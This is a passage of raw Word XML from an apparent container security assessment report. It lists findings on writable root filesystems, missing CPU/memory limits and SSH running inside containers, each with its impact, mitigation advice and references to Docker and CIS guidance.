      <w:tr w:rsidR="00B25578" w14:paraId="11357E40" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="022696B9" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected Container/Pod(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D70F360" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>All in scope containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="6CA2E3CE" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C391598" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44FE58D6" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">An attacker can write exploit scripts or tamper the existing files in containers root filesystem. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="50DEE5FD" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="400A3C6A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BC7B9B" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Use --read-only option.  This prevents any writes to the containers root filesystem at container runtime and enforces the principle of immutable infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1229FE58" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId52" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194316">
        <w:bookmarkStart w:id="40" w:name="_Toc199711445"/>
        <w:bookmarkStart w:id="41" w:name="_Toc200562847"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194316: Containers With No CPU/Memory Limitations</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>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7775943D" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="700F2ADE" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10EC69A2" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>By default, a container has no resource constraints and can use as much of a given resource as the hosts kernel scheduler allows. Docker provides ways to control how much memory, or CPU a container can use, setting runtime configuration flags of the docker run command.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="589D1D61" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E7CEE8D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>It is important not to allow a running container to consume too much of the host machines memory. On Linux hosts, if the kernel detects that there is not enough memory to perform important system functions, then it starts killing processes to free up memory. Any process is subject to killing, including Docker and other important applications. This can effectively bring the entire system down if the wrong process is killed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D868AC" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E3452F8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>By default, each containers access to the host machines CPU cycles is unlimited. You can set various constraints to limit a given containers access to the host machines CPU cycles.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="785FCEAE" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E88DA35" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00FF01A1" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF01A1">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Reference: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3327D36F" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://docs.docker.com/config/containers/resource_constraints/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E71B4C" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="24B9BC55" w14:textId="58E2D09C" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B77438">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Below are the related screenshots:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="047AD622" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D5878AF" wp14:editId="64E84CD6">
                  <wp:extent cx="5929312" cy="341906"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="17" name="Drawing 17" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 17" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId53"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6042438" cy="348429"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="5354F8DF" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C4E9B5" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected Container/Pod(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4146C734" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>All in scope containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="3E27859A" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDC5AD3" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09954C5D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">By default, Docker containers have access to the full RAM and CPU resources of the host. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Leaving them to run with these default settings may lead to performance bottlenecks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9F3B11" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5AA9C641" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>If you don’t limit Dockers memory and CPU usage, Docker can use all the systems resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="18FD492F" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D3D448F" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="027BCCBD" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">It is advised to set memory and CPU limits for all the containers. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="626A1745" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B0B9D25" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="001E1AC0" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001E1AC0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Reference: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27984E37" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://docs.docker.com/config/containers/resource_constraints/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47ED4233" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId54" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194315">
        <w:bookmarkStart w:id="42" w:name="_Toc199711446"/>
        <w:bookmarkStart w:id="43" w:name="_Toc200562848"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>194315: Running SSH Inside Containers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>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B25578" w14:paraId="714FC01A" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74118C38" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="603D3D8C" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>During reconnaissance, it was observed that all the containers in scope is running SSH service on port 22. As a best practice don’t run SSH service in container and don't disclose sensitive data like SSH keys inside containers. Instead, run SSH on the host and use docker exec or docker attach to interact with other containers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="286F11C8" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4809EB0A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRPr="00502BBA" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00502BBA">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8AC01D" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://cloud.redhat.com/blog/hardening-docker-containers-images-and-host-security-toolkit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1345E9BA" w14:textId="2E338C23" w:rsidR="00B25578" w:rsidRPr="006F05B0" w:rsidRDefault="006F05B0" w:rsidP="006F05B0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="0532FE"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId55" w:history="1">
              <w:r w:rsidRPr="006F05B0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                  <w:color w:val="0532FE"/>
                </w:rPr>
                <w:t>https://www.tenable.com/audits/items/CIS_Docker_Community_Edition_L1_Docker_v1.1.0.audit:b6e68c652c1bc572fa9d41212ae84895</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="006F05B0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="0532FE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C2452A4" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://blog.aquasec.com/container-security-best-practices-for-conscientious-devops</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18836820" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6365CBAF" w14:textId="68329A0D" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00F0465F">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Please refer to the below screenshot(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5343F661" w14:textId="0595033C" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24A55BEB" wp14:editId="583BB4D4">
                  <wp:extent cx="5930531" cy="1168842"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="18" name="Drawing 18" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 18" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId56"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5960351" cy="1174719"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="44326E3A" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B898F9F" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Affected Container/Pod(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07578914" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>All in scope containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="0F743890" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DBB761E" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BAF4EF0" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Running SSH service within containers makes managing SSH keys/access policies difficult. This should be avoided if possible. Also, SSH server that is running inside a container may be used by attackers. If attackers gain valid credentials to a container, whether by brute force attempts or by other methods (such as phishing), they can use it to get remote access to the container by SSH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="52BC3013" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78AAAB06" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
